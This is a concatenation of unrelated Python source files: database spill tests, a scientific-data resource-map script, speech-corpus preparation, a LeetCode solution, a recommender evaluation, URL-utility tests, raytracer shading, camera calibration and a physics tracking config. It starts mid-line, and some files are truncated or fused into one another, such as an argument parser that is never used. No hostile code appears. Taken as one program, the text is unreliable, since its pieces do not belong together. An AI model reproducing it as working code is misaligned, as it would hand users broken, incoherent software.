tests.common.test_dimensions import create_uncompressed_text_dimension class TestScratchLimit(ImpalaTestSuite): """ This class tests the functionality of setting the scratch limit as a query option """ spill_query = """ select o_orderdate, o_custkey, o_comment from tpch.orders order by o_orderdate """ # Block manager memory limit that is low enough to # force Impala to spill to disk when executing 'spill_query' max_block_mgr_memory = "64m" @classmethod def get_workload(self): return 'functional-query' @classmethod def add_test_dimensions(cls): super(TestScratchLimit, cls).add_test_dimensions() # There is no reason to run these tests using all dimensions. cls.ImpalaTestMatrix.add_dimension(create_single_exec_option_dimension()) cls.ImpalaTestMatrix.add_dimension( create_uncompressed_text_dimension(cls.get_workload())) def test_with_high_scratch_limit(self, vector): """ Query runs to completion with a scratch limit well above its required scratch space which in this case is 128m. """ exec_option = vector.get_value('exec_option') exec_option['max_block_mgr_memory'] = self.max_block_mgr_memory exec_option['scratch_limit'] = '500m' self.execute_query_expect_success(self.client, self.spill_query, exec_option) def test_with_low_scratch_limit(self, vector): """ Query throws the appropriate exception with a scratch limit well below its required scratch space which in this case is 128m. 
""" exec_option = vector.get_value('exec_option') exec_option['max_block_mgr_memory'] = self.max_block_mgr_memory exec_option['scratch_limit'] = '24m' expected_error = 'Scratch space limit of %s bytes exceeded' scratch_limit_in_bytes = 24 * 1024 * 1024 try: self.execute_query(self.spill_query, exec_option) assert False, "Query was expected to fail" except ImpalaBeeswaxException as e: assert expected_error % scratch_limit_in_bytes in str(e) def test_with_zero_scratch_limit(self, vector): """ Query throws the appropriate exception with a scratch limit of zero which means no scratch space can be allocated. """ exec_option = vector.get_value('exec_option') exec_option['max_block_mgr_memory'] = self.max_block_mgr_memory exec_option['scratch_limit'] = '0' self.execute_query_expect_failure(self.spill_query, exec_option) def test_with_unlimited_scratch_limit(self, vector): """ Query runs to completion with a scratch Limit of -1 means default/no limit. """ exec_option = vector.get_value('exec_option') exec_option['max_block_mgr_memory'] = self.max_block_mgr_memory exec_option['scratch_limit'] = '-1' self.execute_query_expect_success(self.client, self.spill_query, exec_option) def test_without_specifying_scratch_limit(self, vector): """ Query runs to completion with the default setting of no scratch limit. """ exec_option = vector.get_value('exec_option') exec_option['max_block_mgr_memory'] = self.max_block_mgr_memory self.execute_query_expect_success(self.client, self.spill_query, exec_option) def test_with_zero_scratch_limit_no_memory_limit(self, vector): """ Query runs to completion without spilling as there is no limit on block memory manger. Scratch limit of zero ensures spilling is disabled. """ exec_option = vector.get_value('exec_option') exec_option['scratch_limit'] = '0' self.execute_query_expect_success(self.client, self.spill_query, exec_option) #!/usr/bin/env python # This work was created by participants in the DataONE project, and is # jointly copyrighted by participating institutions in DataONE. For # more information on DataONE, see our web site at http://dataone.org. # # Copyright 2009-2017 DataONE # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Generate a Data Package (Resource Map) from a stream of PIDs. This is an example on how to use the DataONE Client and Common libraries for Python. 
""" import argparse import logging import d1_common.const import d1_common.env import d1_common.resource_map def main(): parser = argparse.ArgumentParser( description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter ) parser.add_argument("--debug", action="store_true", help="Debug level logging") parser.add_argument( "--env", type=str, default="prod", help="Environment, one of {}".format(", ".join(d1_common.env.D1_ENV_DICT)), ) parser.add_argument( "--cert-pub", dest="cert_pem_path", action="store", help="Path to PEM formatted public key of certificate", ) parser.add_argument( "--cert-key", dest="cert_key_path", action="store", help="Path to PEM formatted private key of certificate", ) parser.add_argument( "--timeout", action="store", default=d1_common.const.DEFAULT_HTTP_TIMEOUT, help="Amount of time to wait for calls to complete (seconds)", ) def createSimpleResourceMap(ore_pid, sci_meta_pid, data_pids): """Create a simple resource map with one metadata document and n data objects.""" ore = d1_common.resource_map.ResourceMap() ore.initialize(ore_pid) ore.addMetadataDocument(sci_meta_pid) ore.addDataDocuments(data_pids, sci_meta_pid) return ore def pids2ore(in_stream, fmt="xml", base_url="https://cn.dataone.org/cn"): """read pids from in_stream and generate a resource map. first pid is the ore_pid second is the sci meta pid remainder are data pids """ pids = [] for line in in_stream: pid = line.strip() if len(pid) > 0: if not pid.startswith("# "): pids.append(pid) if (len(pids)) < 2: raise ValueError("Insufficient identifiers provided.") logging.info("Read %d identifiers", len(pids)) ore = d1_common.resource_map.ResourceMap(base_url=base_url) logging.info("ORE PID = %s", pids[0]) ore.initialize(pids[0]) logging.info("Metadata PID = %s", pids[1]) ore.addMetadataDocument(pids[1]) ore.addDataDocuments(pids[2:], pids[1]) return ore.serialize_to_display(doc_format=fmt) # 2020 and """ Base strategy class for a specific task. This class is open for custom extension, in order to create different execution strategies for this task. See BaseStrategy for more details. 
""" from abc import abstractmethod from typing import List from icarus_simulator.strategies.base_strat import BaseStrat from icarus_simulator.structure_definitions import ( PathData, Edge, EdgeData, DirectionData, ) class BasePathFilteringStrat(BaseStrat): @abstractmethod def compute( self, edges: List[Edge], edge_data: EdgeData, path_data: PathData, allowed_sources: List[int], ) -> DirectionData: raise NotImplementedError import os import click from tqdm import tqdm import audiomate from audiomate.corpus import subset SEED = 3294 MAX_DEV_TEST_DURATION = 15000 MAX_TRAIN_UTT_DURATION = 25.0 @click.command() @click.argument('download_folder', type=click.Path(exists=True)) @click.argument('output_folder', type=click.Path()) def run(download_folder, output_folder): corpora_names = [ ('common_voice', 'common-voice'), ('mailabs', 'mailabs'), ('swc', 'swc'), ('tuda', 'tuda'), ('voxforge', 'voxforge'), ] print('Load corpora') corpora = {} for name, reader_type in corpora_names: print(' - {} ...'.format(name)) full_path = os.path.join(download_folder, name) c = audiomate.Corpus.load( full_path, reader=reader_type ) corpora[name] = c print('Create Train/Dev/Test - if not already exist') for name, corpus in corpora.items(): prepare_corpus(corpus, name) print('Insert full subviews') # # Insert subviews containing all utterances # so we have a reference when merged # for name, corpus in corpora.items(): all_utts = set(corpus.utterances.keys()) full_filter = subset.MatchingUtteranceIdxFilter(all_utts) full_subview = subset.Subview(corpus, filter_criteria=[full_filter]) corpus.import_subview('full', full_subview) print('Suffix subviews') # # Suffix subviews to have the correct names when merging # for name, corpus in corpora.items(): print(' - {} ...'.format(name)) original_subview_names = list(corpus.subviews.keys()) for subview_name in original_subview_names: new_subview_name = '{}_{}'.format(subview_name, name) corpus.subviews[new_subview_name] = corpus.subviews[subview_name] del corpus.subviews[subview_name] print('Merge corpora ...') full_corpus = audiomate.Corpus.merge_corpora(list(corpora.values())) print('Create merged train/test/dev subviews ...') for part in ['train', 'dev', 'test']: utt_ids = set() for name, corpus in corpora.items(): sv = full_corpus.subviews['{}_{}'.format(part, name)] utt_ids.update(sv.utterances.keys()) part_filter = subset.MatchingUtteranceIdxFilter(utt_ids) part_subview = subset.Subview(corpus, filter_criteria=[part_filter]) full_corpus.import_subview(part, part_subview) print('Save ...') os.makedirs(output_folder) full_corpus.save_at(output_folder) def prepare_corpus(corpus, name): if name != 'common_voice': print(' - {}: Find utterances that are too long'.format(name)) too_long = utts_too_long(corpus) else: too_long = set() if name == 'mailabs': # we only use mailabs for training # since we don't know the speakers train_utts = set(corpus.utterances.keys()) train_utts = train_utts - too_long dev_utts = set() test_utts = set() elif name == 'tuda': # we only use kinect-raw files # otherwise sentence of the tuda would occur multiple times # in contrast to other datasets train_utts = set(corpus.subviews['train_kinect-raw'].utterances.keys()) train_utts = train_utts - too_long dev_utts = set(corpus.subviews['dev_kinect-raw'].utterances.keys()) test_utts = set(corpus.subviews['test_kinect-raw'].utterances.keys()) elif name == 'common_voice': train_utts = set(corpus.subviews['train'].utterances.keys()) train_utts = train_utts - too_long dev_utts = 
set(corpus.subviews['dev'].utterances.keys()) test_utts = set(corpus.subviews['test'].utterances.keys()) else: dur_filter = subset.MatchingUtteranceIdxFilter(too_long, inverse=True) dur_subview = subset.Subview(corpus, filter_criteria=[dur_filter]) train, dev, test = create_train_dev_test(dur_subview) train_utts = set(train.utterances.keys()) dev_utts = set(dev.utterances.keys()) test_utts = set(test.utterances.keys()) # Remove all subviews for subname in list(corpus.subviews.keys()): del corpus.subviews[subname] # Add new subviews train_filter = subset.MatchingUtteranceIdxFilter(train_utts) train_subview = subset.Subview(corpus, filter_criteria=[train_filter]) corpus.import_subview('train', train_subview) dev_filter = subset.MatchingUtteranceIdxFilter(dev_utts) dev_subview = subset.Subview(corpus, filter_criteria=[dev_filter]) corpus.import_subview('dev', dev_subview) test_filter = subset.MatchingUtteranceIdxFilter(test_utts) test_subview = subset.Subview(corpus, filter_criteria=[test_filter]) corpus.import_subview('test', test_subview) def utts_too_long(corpus): utts = set() for utt in tqdm(corpus.utterances.values()): if utt.duration > MAX_TRAIN_UTT_DURATION: utts.add(utt.idx) return utts def create_train_dev_test(corpus): """ Create train/dev/test subsets of the given corpus. Size is computed using length of the transcriptions. """ total_duration = corpus.total_duration test_dev_train_ratio = MAX_DEV_TEST_DURATION / total_duration if test_dev_train_ratio > 0.15: test_dev_train_ratio = 0.15 splitter = subset.Splitter(corpus, SEED) subviews = splitter.split_by_label_length( proportions={ 'train': 1.0 - (2 * test_dev_train_ratio), 'dev': test_dev_train_ratio, 'test': test_dev_train_ratio, }, label_list_idx=audiomate.corpus.LL_WORD_TRANSCRIPT, separate_issuers=True ) return subviews['train'], subviews['dev'], subviews['test'] if __name__ == '__main__': run() # coding=utf-8 """Pre-configured OpenMM Topology object for use with the default protons forcefield.""" from simtk.openmm.app import Topology import os PACKAGE_ROOT = os.path.abspath(os.path.dirname(__file__)) # Patch topology to unload standard bond definitions def unloadStandardBonds(cls): """ Resets _standardBonds and _hasLoadedStandardBonds to original state. """ cls._hasLoadedStandardBonds = False cls._standardBonds = dict() Topology.unloadStandardBonds = classmethod(unloadStandardBonds) Topology.unloadStandardBonds() Topology.loadBondDefinitions( os.path.join(PACKAGE_ROOT, "data", "bonds-amber10-constph.xml") ) LeetCode/weekly-contest-164-2019.11.24/suggestedProducts_1268.py0 #!/usr/bin/env python # -*- coding: utf-8 -*- """ ------------------------------------------------- @ Author : pengj @ date : 2019/11/25 17:27 @ IDE : PyCharm @ GitHub : https://github.com/JackyPJB @ Contact : ------------------------------------------------- Description : 1268. 搜索推荐系统 Search Suggestions System. https://leetcode-cn.com/contest/weekly-contest-164/problems/search-suggestions-system/ ------------------------------------------------- """ import time from typing import List __author__ = 'Max_Pengjb' start_time = time.time() # 下面写上代码块 class Solution: def suggestedProducts(self, products: List[str], searchWord: str) -> List[List[str]]: # 我的思路: # 第一想到的是字典树,看到查找的单词只有一个,想想又要建树,又要查询,遍历好几遍,费时。 # 想到一个简单的:dp 方法 : # 1. 先排序,这没啥好说的 # 2. searchword 查找到第 i 个字母的时候,其实他查找的范围是 i-1 个字母的结果 # 3. 
你品,你细品 n = len(searchWord) products.sort() res = [] for i in range(n): tmp = [] for pro in products: if i < len(pro) and pro[i] == searchWord[i]: tmp.append(pro) products = tmp res.append(tmp) res = list(map(lambda x: x[0:3], res)) return res inin = ["havana"] searchWord = "havana" rr = Solution().suggestedProducts(inin, searchWord) print(rr) # 上面中间写上代码块 end_time = time.time() print('Running time: %s Seconds' % (end_time - start_time)) harsh2kumar/movielens-transetest_embedding.py from __future__ import absolute_import, division, print_function import os import sys import argparse import random import numpy as np import pickle from easydict import EasyDict as edict from math import log import torch import torch.nn as nn # from data_utils import * from models import KnowledgeEmbedding def load_embedding(args): state_dict = torch.load(args.model_file) user_embed = state_dict['user.weight'].cpu() movie_embed = state_dict['movie.weight'].cpu() watched_embed = state_dict['user_watched_movie'].cpu() watched_bias = state_dict['user_watched_movie_bias.weight'].cpu() # product_embed = state_dict['product.weight'].cpu() # purchase_embed = state_dict['purchase'].cpu() # purchase_bias = state_dict['purchase_bias.weight'].cpu() results = edict( user_embed=user_embed.data.numpy(), movie_embed=movie_embed.data.numpy(), watched_embed=watched_embed.data.numpy(), watched_bias=watched_bias.data.numpy(), # product_embed=product_embed.data.numpy(), # purchase_embed=purchase_embed.data.numpy(), # purchase_bias=purchase_bias.data.numpy(), ) output_file = '{}/{}_embedding.pkl'.format(args.dataset_dir, args.dataset) with open(output_file, 'wb') as f: pickle.dump(results, f) def load_train_reviews(args): user_watched = {} # {uid: [pid,...], ...} with open(args.train_review_file, 'r') as f: for line in f: line = line.strip() arr = line.split('\t') user_idx = int(arr[0]) movie_idx = int(arr[2]) if user_idx not in user_watched: user_watched[user_idx] = [] user_watched[user_idx].append(movie_idx) output_file = '{}/{}_train_label.pkl'.format(args.dataset_dir, args.dataset) with open(output_file, 'wb') as f: pickle.dump(user_watched, f) # def load_train_reviews(args): # user_products = {} # {uid: [pid,...], ...} # with gzip.open(args.train_review_file, 'r') as f: # for line in f: # line = line.decode('utf-8').strip() # arr = line.split('\t') # user_idx = int(arr[0]) # product_idx = int(arr[1]) # if user_idx not in user_products: # user_products[user_idx] = [] # user_products[user_idx].append(product_idx) # output_file = '{}/{}_train_label.pkl'.format(args.dataset_dir, args.dataset) # with open(output_file, 'wb') as f: # pickle.dump(user_products, f) # def load_test_reviews(args): # user_products = {} # {uid: [pid,...], ...} # with open(args.test_review_file, 'r') as f: # for line in f: # line = line.decode('utf-8').strip() # arr = line.split('\t') # user_idx = int(arr[0]) # product_idx = int(arr[1]) # if user_idx not in user_products: # user_products[user_idx] = [] # user_products[user_idx].append(product_idx) # output_file = '{}/{}_test_label.pkl'.format(args.dataset_dir, args.dataset) # with open(output_file, 'wb') as f: # pickle.dump(user_products, f) def load_test_reviews(args): user_watched = {} # {uid: [pid,...], ...} with open(args.test_review_file, 'r') as f: for line in f: line = line.strip() arr = line.split('\t') user_idx = int(arr[0]) movie_idx = int(arr[2]) if user_idx not in user_watched: user_watched[user_idx] = [] user_watched[user_idx].append(movie_idx) output_file = 
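# Editor's aside (illustration only): the comments above are in Chinese; roughly, the
# author first considered a trie but, with only a single search word, chose a simpler
# plan -- sort the products, then at each prefix length filter the survivors from the
# previous prefix. A well-known alternative on the same sorted list uses binary search
# (bisect) to jump straight to the first candidate for each prefix; a standalone sketch:
import bisect
from typing import List


def suggested_products(products: List[str], search_word: str) -> List[List[str]]:
    products = sorted(products)
    result = []
    prefix = ''
    for ch in search_word:
        prefix += ch
        start = bisect.bisect_left(products, prefix)          # first product >= prefix
        result.append([p for p in products[start:start + 3] if p.startswith(prefix)])
    return result


# Example: suggested_products(["mobile", "mouse", "moneypot", "monitor", "mousepad"], "mouse")
# -> [['mobile', 'moneypot', 'monitor'], ['mobile', 'moneypot', 'monitor'],
#     ['mouse', 'mousepad'], ['mouse', 'mousepad'], ['mouse', 'mousepad']]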
'{}/{}_test_label.pkl'.format(args.dataset_dir, args.dataset) with open(output_file, 'wb') as f: pickle.dump(user_watched, f) def test(args, topk=10): embed_file = '{}/{}_embedding.pkl'.format(args.dataset_dir, args.dataset) with open(embed_file, 'rb') as f: embeddings = pickle.load(f) train_labels_file = '{}/{}_train_label.pkl'.format(args.dataset_dir, args.dataset) with open(train_labels_file, 'rb') as f: train_user_movie = pickle.load(f) test_labels_file = '{}/{}_test_label.pkl'.format(args.dataset_dir, args.dataset) with open(test_labels_file, 'rb') as f: test_user_movie = pickle.load(f) test_user_idxs = list(test_user_movie.keys()) # print('Num of users:', len(user_idxs)) # print('User:', user_idxs[0], 'Products:', user_products[user_idxs[0]]) user_embed = embeddings['user_embed'][:-1] # remove last dummy user watched_embed = embeddings['watched_embed'] movie_embed = embeddings['movie_embed'][:-1] print('user embed:', user_embed.shape, 'movie embed:', movie_embed.shape) # calculate user + watched embeddings calulated_movie_emb = user_embed + watched_embed # normalize embeddings(TBD) # calulated_product_emb = calulated_product_emb/LA.norm(calulated_product_emb, axis=1, keepdims=True) # calculate Nearest Neighbors scores_matrix = np.dot(calulated_movie_emb, movie_embed.T) print('Max score:', np.max(scores_matrix)) # normalize embeddings(TBD) # norm_calulated_product_emb = calulated_product_emb/LA.norm(calulated_product_emb, axis=1, keepdims=True) # norm_product_embed = product_embed/LA.norm(product_embed, axis=1, keepdims=True) # scores_matrix = np.dot(norm_calulated_product_emb, np.transpose(norm_product_embed)) # print (scores_matrix.shape) # filter the test data item which trained in train data idx_list = [] for uid in train_user_movie: pids = train_user_movie[uid] tmp = list(zip([uid] * len(pids), pids)) idx_list.extend(tmp) idx_list = np.array(idx_list) scores_matrix[idx_list[:, 0], idx_list[:, 1]] = -99 if scores_matrix.shape[1] <= 30000: top_matches = np.argsort(scores_matrix) # sort row by row topk_matches = top_matches[:, -topk:] # user-product matrix, from lowest rank to highest else: # sort in batch way topk_matches = np.zeros((scores_matrix.shape[0], topk), dtype=np.int) i = 0 while i < scores_matrix.shape[0]: start_row = i end_row = np.min([i + 100, scores_matrix.shape[0]]) batch_scores = scores_matrix[start_row:end_row, :] matches = np.argsort(batch_scores) topk_matches[start_row:end_row] = matches[:, -topk:] i = end_row # f = open('results.txt', 'w') # Compute metrics precisions, recalls, ndcgs, hits = [], [], [], [] for uid in test_user_idxs: pred_list, rel_set = topk_matches[uid][::-1], test_user_movie[uid] dcg = 0.0 hit_num = 0.0 for i in range(len(pred_list)): if pred_list[i] in rel_set: dcg += 1. / (log(i + 2) / log(2)) hit_num += 1 # idcg idcg = 0.0 for i in range(min(len(rel_set), len(pred_list))): idcg += 1. 
/ (log(i + 2) / log(2)) ndcg = dcg / idcg recall = hit_num / len(rel_set) precision = hit_num / len(pred_list) hit = 1.0 if hit_num > 0.0 else 0.0 ndcgs.append(ndcg) recalls.append(recall) precisions.append(precision) hits.append(hit) # print(uid) # f.write(' '.join(map(str, pred_list))) # f.write('\n') # f.write(' '.join(map(str, rel_set))) # f.write('\n') # f.close() avg_precision = np.mean(precisions) * 100 avg_recall = np.mean(recalls) * 100 avg_ndcg = np.mean(ndcgs) * 100 avg_hit = np.mean(hits) * 100 print('NDCG={:.3f} | Recall={:.3f} | HR={:.3f} | Precision={:.3f}'.format( avg_ndcg, avg_recall, avg_hit, avg_precision)) # print('NDCG={} | Recall={} | HR={} | Precision={}'.format( # avg_ndcg, avg_recall, avg_hit, avg_precision)) def main(): parser = argparse.ArgumentParser() parser.add_argument('--dataset', type=str, default='MovieLens20M_300epochs', help='One of {MovieLens20M}') args = parser.parse_args() args.dataset_dir = './tmp/{}'.format(args.dataset) # args.dataset_file = args.dataset_dir + '/dataset.pkl' # print(args.dataset_dir + '/train_embedding/embedding_1hop_des_epoch_77.ckpt') model_files = { 'MovieLens20M': args.dataset_dir + '/train_3hop_des_embedding/embedding_3hop_des_epoch_30.ckpt', 'MovieLens20M_100epochs': args.dataset_dir + '/train_embedding/embedding_1hop_des_epoch_100.ckpt', 'MovieLens20M_300epochs': args.dataset_dir + '/train_embedding/embedding_1hop_des_epoch_300.ckpt', # 'Beauty': args.dataset_dir + '/train_embedding_final/embedding_des_epoch_29.ckpt', # 'Cellphones_Accessories': args.dataset_dir + '/train_embedding_final/embedding_des_epoch_30.ckpt', # 'Clothing': args.dataset_dir + '/train_embedding_final/embedding_des_epoch_29.ckpt', # 'CDs_Vinyl': args.dataset_dir + '/train_embedding/embedding_epoch_20.ckpt', } args.model_file = model_files[args.dataset] review_dir = { 'MovieLens20M': './data_processed', 'MovieLens20M_100epochs': './data_processed', 'MovieLens20M_300epochs': './data_processed', # 'Beauty': './data/CIKM2017/reviews_Beauty_5.json.gz.stem.nostop/min_count5/query_split', # 'CDs_Vinyl': './data/CIKM2017/reviews_CDs_and_Vinyl_5.json.gz.stem.nostop/min_count5/query_split', # 'Cellphones_Accessories': './data/CIKM2017/reviews_Cell_Phones_and_Accessories_5.json.gz.stem.nostop/min_count5/query_split', # 'Movies_TV': './data/CIKM2017/reviews_Movies_and_TV_5.json.gz.stem.nostop/min_count5/query_split', # 'Clothing': './data/CIKM2017/reviews_Clothing_Shoes_and_Jewelry_5.json.gz.stem.nostop/min_count5/query_split', } # args.train_review_file = review_dir[args.dataset] + '/train.txt.gz' # args.test_review_file = review_dir[args.dataset] + '/test.txt.gz' args.train_review_file = review_dir[args.dataset] + '/relations_indices/user.watched.movie.txt' args.test_review_file = review_dir[args.dataset] + '/test_indices/test_data.txt' load_embedding(args) load_train_reviews(args) load_test_reviews(args) test(args) if __name__ == '__main__': main() ### test number of users in train set <= 5 ### # ################################################################################################# # # user_watched = {} # {uid: [pid,...], ...} # with open('/home/hrv7/harsh/PycharmProjects/movielens-transe/data_processed/relations_indices/user.watched.movie.txt', 'r') as file_: # for line in file_: # line = line.strip() # arr = line.split('\t') # user_idx = int(arr[0]) # movie_idx = int(arr[2]) # if user_idx not in user_watched: # user_watched[user_idx] = [] # user_watched[user_idx].append(movie_idx) # # for key, items in user_watched.items(): # if len(items)<=5: # 
print('train_user: ', key) # print(items) # # user_watched = {} # {uid: [pid,...], ...} # with open('/home/hrv7/harsh/PycharmProjects/movielens-transe/data_processed/test_indices/test_data.txt', 'r') as f: # for line in f: # line = line.strip() # arr = line.split('\t') # user_idx = int(arr[0]) # movie_idx = int(arr[2]) # if user_idx not in user_watched: # user_watched[user_idx] = [] # user_watched[user_idx].append(movie_idx) # # for key, items in user_watched.items(): # if len(items)<=5: # print('test_user: ', key)""" Tests for the various utility functions """ # pylint:disable=missing-docstring import pytest import requests from authl import utils def test_request_url(requests_mock): requests_mock.get('http://example.com/', text='insecure') assert utils.request_url('example.com').text == 'insecure' requests_mock.get('https://example.com/', text='secure') assert utils.request_url('example.com').text == 'secure' assert utils.request_url('https://example.com').text == 'secure' assert utils.request_url('http://example.com').text == 'insecure' assert utils.request_url('http://nonexistent') is None assert utils.request_url('invalid://protocol') is None requests_mock.get('https://has.links/', headers={'Link': '; rel="bar"'}) assert utils.request_url('has.links').links['bar']['url'] == 'https://foo' def test_resolve_value(): def moo(): return 5 assert utils.resolve_value(moo) == 5 assert utils.resolve_value(10) == 10 def test_permanent_url(requests_mock): requests_mock.get('http://make-secure.example', status_code=301, headers={'Location': 'https://make-secure.example'}) requests_mock.get('https://make-secure.example', status_code=302, headers={'Location': 'https://make-secure.example/final'}) requests_mock.get('https://make-secure.example/final', text="you made it!") # this redirects permanent to https, which redirects temporary to /final req = requests.get('http://make-secure.example') assert utils.permanent_url(req) == 'https://make-secure.example' # direct request to /final should remain /final req = requests.get('https://make-secure.example/final') assert utils.permanent_url(req) == 'https://make-secure.example/final' # correct case folding req = requests.get('Https://Make-SecuRE.Example/final') assert utils.permanent_url(req) == 'https://make-secure.example/final' # ensure 308 redirect works too requests_mock.get('http://perm-308.example', status_code=308, headers={'Location': 'https://make-secure.example/308'}) requests_mock.get('https://make-secure.example/308', status_code=401) req = requests.get('http://perm-308.example') assert utils.permanent_url(req) == 'https://make-secure.example/308' # make sure that it's the last pre-temporary redirect that counts requests_mock.get('https://one/', status_code=301, headers={'Location': 'https://two/'}) requests_mock.get('https://two/', status_code=302, headers={'Location': 'https://three/'}) requests_mock.get('https://three/', status_code=301, headers={'Location': 'https://four/'}) requests_mock.get('https://four/', text="done") req = requests.get('https://one/') assert req.url == 'https://four/' assert utils.permanent_url(req) == 'https://two/' assert req.text == 'done' req = requests.get('https://two/') assert req.url == 'https://four/' assert utils.permanent_url(req) == 'https://two/' assert req.text == 'done' req = requests.get('https://three/') assert req.url == 'https://four/' assert utils.permanent_url(req) == 'https://four/' assert req.text == 'done' def test_pkce_challenge(): assert utils.pkce_challenge('asdf', 'plain') == 'asdf' assert 
utils.pkce_challenge('foo', 'S256') == 'LCa0a2j_xo_5m0U8HTBBNBNCLXBkg7-g-YpeiGJm564' with pytest.raises(Exception): utils.pkce_challenge('moo', 'plap') giorgiosironi/search from flask import Blueprint, Response from lxml import etree LIBERO_NAMESPACE = 'http://libero.pub' NAMESPACE_MAP = {None: LIBERO_NAMESPACE} def get_search_blueprint() -> Blueprint: blueprint = Blueprint('search', __name__) @blueprint.route('/search', methods=['GET']) def search() -> Response: # pylint: disable=unused-variable root = etree.Element('item-list', nsmap=NAMESPACE_MAP) response = etree.tostring(root, xml_declaration=True, encoding='UTF-8') return Response(response=response, status=200, mimetype='application/xml') return blueprint from dataclasses import dataclass, field from typing import Optional from raytracer.tuple import ( tuple, point, vector, magnitude, normalize, dot, cross, reflect, Color, ) from raytracer.lights import PointLight from raytracer.patterns import Pattern @dataclass class Material: color: Color = field(default_factory=lambda: Color(1, 1, 1)) ambient: float = 0.1 diffuse: float = 0.9 specular: float = 0.9 shininess: float = 200.0 pattern: Optional[Pattern] = None black = Color(0, 0, 0) def lighting(material, object, light: PointLight, point, eyev, normalv, in_shadow): if material.pattern is not None: color = material.pattern.pattern_at_shape(object, point) else: color = material.color # combine the surface color with the light's color/intensity effective_color = color * light.intensity # find the direction to the light source lightv = normalize(light.position - point) # compute the ambient contribution ambient = effective_color * material.ambient if in_shadow: return ambient # light_dot_normal: represents the cosine of the angle between the # light vector and the normal vector. A negative number means the # light is on the other side of the surface. light_dot_normal = dot(lightv, normalv) if light_dot_normal < 0: diffuse = black specular = black else: # compute the diffuse contribution diffuse = effective_color * material.diffuse * light_dot_normal # reflect_dot_eye represents the cosine of the angle between the # reflection vector and the eye vector. A negative number means the # light reflects away from the eye. reflectv = reflect(-lightv, normalv) reflect_dot_eye = dot(reflectv, eyev) if reflect_dot_eye <= 0: specular = black else: # compute the specular contribution factor = reflect_dot_eye ** material.shininess specular = light.intensity * material.specular * factor # Add the three contributions together to get the final shading return ambient + diffuse + specular 1-10 import pickle from pathlib import Path import cv2 import numpy as np __all__ = ["Camera", "CALIBRATION_DATA_PATH"] CALIBRATION_DATA_PATH = "camera_cal/calibration.dat" class Camera: @staticmethod def undistort(distorted_img, calibration_data, **kwargs): (_, mtx, dist, _, _) = calibration_data return cv2.undistort(distorted_img, mtx, dist, None, mtx) @staticmethod def calibrate(img_paths, grid=(9, 6)): nx = grid[0] ny = grid[1] grid_indices = np.zeros((nx * ny, 3), np.float32) grid_indices[:, :2] = np.mgrid[0:nx, 0:ny].T.reshape(-1, 2) # Arrays to store object points and image points from all the images. grid_list = [] # 3d points in real world space corners_list = [] # 2d points in image plane. 
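# --- Hedged usage sketch (not part of the Camera class above) -----------------
# This shows how calibrate/save_calibration/load_calibration/undistort fit
# together. The glob pattern and the test image path are assumptions made for
# the example; only CALIBRATION_DATA_PATH comes from the module itself.
# cv2.calibrateCamera returns (ret, mtx, dist, rvecs, tvecs), which is exactly
# the tuple that save_calibration() pickles and that undistort() unpacks.
import glob
import cv2

def calibrate_then_undistort_example():
    chessboard_paths = glob.glob("camera_cal/calibration*.jpg")  # assumed input location
    calibration_data = Camera.calibrate(chessboard_paths, grid=(9, 6))
    Camera.save_calibration(CALIBRATION_DATA_PATH, calibration_data)

    # In a later run the pickled coefficients can be reused on any frame
    # captured by the same camera.
    calibration_data = Camera.load_calibration(CALIBRATION_DATA_PATH)
    frame = cv2.imread("test_images/test1.jpg")  # assumed test frame
    return Camera.undistort(frame, calibration_data)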
img_shape = None for img_path in img_paths: img = cv2.imread(img_path) gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) if not img_shape: img_shape = gray.shape[::-1] # Find the chessboard corners ret, detected_corners = cv2.findChessboardCorners(gray, grid, None) # If found, add object points, image points if ret == False: continue grid_list.append(grid_indices) corners_list.append(detected_corners) return cv2.calibrateCamera(grid_list, corners_list, img_shape, None, None) @staticmethod def save_calibration(path, caliberation_data): path = Path(path) path.parent.mkdir(parents=True, exist_ok=True) with path.open(mode="wb") as fp: pickle.dump(caliberation_data, fp) @staticmethod def load_calibration(path): path = Path(path) with path.open(mode="rb") as fp: return pickle.load(fp) import FWCore.ParameterSet.Config as cms # TrackingMonitor #### # Clone for Cosmic Track Finder from DQM.TrackingMonitor.TrackerCosmicsTrackingMonitor_cfi import * TrackMon_cosmicTk = TrackerCosmicTrackMon.clone( TrackProducer = 'cosmictrackfinderP5', AlgoName = 'CosmicTk', FolderName = 'Tracking/TrackParameters', doSeedParameterHistos = True ) # Clone for CKF Tracks from DQM.TrackingMonitor.TrackerCosmicsTrackingMonitor_cfi import * TrackMon_ckf = TrackerCosmicTrackMon.clone( TrackProducer = 'ctfWithMaterialTracksP5', AlgoName = 'CKFTk', FolderName = 'Tracking/TrackParameters', doSeedParameterHistos = True ) # Clone for Road Search Tracks from DQM.TrackingMonitor.TrackerCosmicsTrackingMonitor_cfi import * TrackMon_rs = TrackerCosmicTrackMon.clone( TrackProducer = 'rsWithMaterialTracksP5', AlgoName = 'RSTk', FolderName = 'Tracking/TrackParameters', doSeedParameterHistos = True ) # Clone for Beam Halo Muon Tracks # from DQM.TrackingMonitor.TrackerCosmicsTrackingMonitor_cfi import * # TrackMon_bhmuon = TrackerCosmicTrackMon.clone( # TrackProducer = 'ctfWithMaterialTracksBeamHaloMuon', # AlgoName = 'BHMuonTk', # FolderName = 'Tracking/TrackParameters', # doSeedParameterHistos = True # ) # Tracking Efficiency # Clone for Cosmic Tracks from DQM.TrackingMonitor.TrackEfficiencyMonitor_cfi import * TrackEffMon_cosmicTk = TrackEffMon.clone( TKTrackCollection = 'cosmictrackfinderP5', AlgoName = 'CosmicTk', FolderName = 'Tracking/TrackParameters/TrackEfficiency' ) # Clone for CKF Tracks from DQM.TrackingMonitor.TrackEfficiencyMonitor_cfi import * TrackEffMon_ckf = TrackEffMon.clone( TKTrackCollection = 'ctfWithMaterialTracksP5', AlgoName = 'CKFTk', FolderName = 'Tracking/TrackParameters/TrackEfficiency' ) # Clone for RS Tracks # from DQM.TrackingMonitor.TrackEfficiencyMonitor_cfi import * # TrackEffMon_rs = TrackEffMon.clone( # TKTrackCollection = 'rsWithMaterialTracksP5', # AlgoName = 'RSTk', # FolderName = 